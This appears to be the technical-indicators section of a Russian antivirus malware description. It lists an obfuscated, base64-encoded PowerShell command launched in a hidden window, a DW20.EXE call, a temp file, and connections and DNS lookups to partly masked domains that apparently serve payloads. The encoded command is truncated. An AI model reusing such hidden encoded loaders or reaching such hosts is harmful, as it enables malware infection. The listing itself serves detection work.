Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD IAAgAHMAZQBUAC0AVgBBAFIASQBhAEIAbABlACAAIAAoACcAOQA2ACcAKwAnAGUAMwAnACkAIAAoACAAIABbAHQAWQBQAEUAXQAoACIAewAxAH0AewAwAH0AewAzAH0AewAyAH0AIgAgAC0AZgAgACcALgBJAE8AJwAsACcAcw...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1972
- %TEMP%\1166029.cvr
- 'ho####tchamelia.com':443
- 'po######ousedurban.co.za':443
- 'to##ak.ie':443
- 'th####library.de':443
- 'ma##c.top':443
- 'jw###ncare.vn':443
- '9s##.com':443
- 'ho####tchamelia.com':443
- 'po######ousedurban.co.za':443
- 'to##ak.ie':443
- 'th####library.de':443
- 'jw###ncare.vn':443
- '9s##.com':443
- DNS ASK ho####tchamelia.com
- DNS ASK po######ousedurban.co.za
- DNS ASK to##ak.ie
- DNS ASK th####library.de
- DNS ASK co######udelien.fbcars.net
- DNS ASK ma##c.top
- DNS ASK jw###ncare.vn
- DNS ASK 9s##.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD IAAgAHMAZQBUAC0AVgBBAFIASQBhAEIAbABlACAAIAAoACcAOQA2ACcAKwAnAGUAMwAnACkAIAAoACAAIABbAHQAWQBQAEUAXQAoACIAewAxAH0AewAwAH0AewAzAH0AewAyAH0AIgAgAC0AZgAgACcALgBJAE8AJwAsACcAcw...' (со скрытым окном)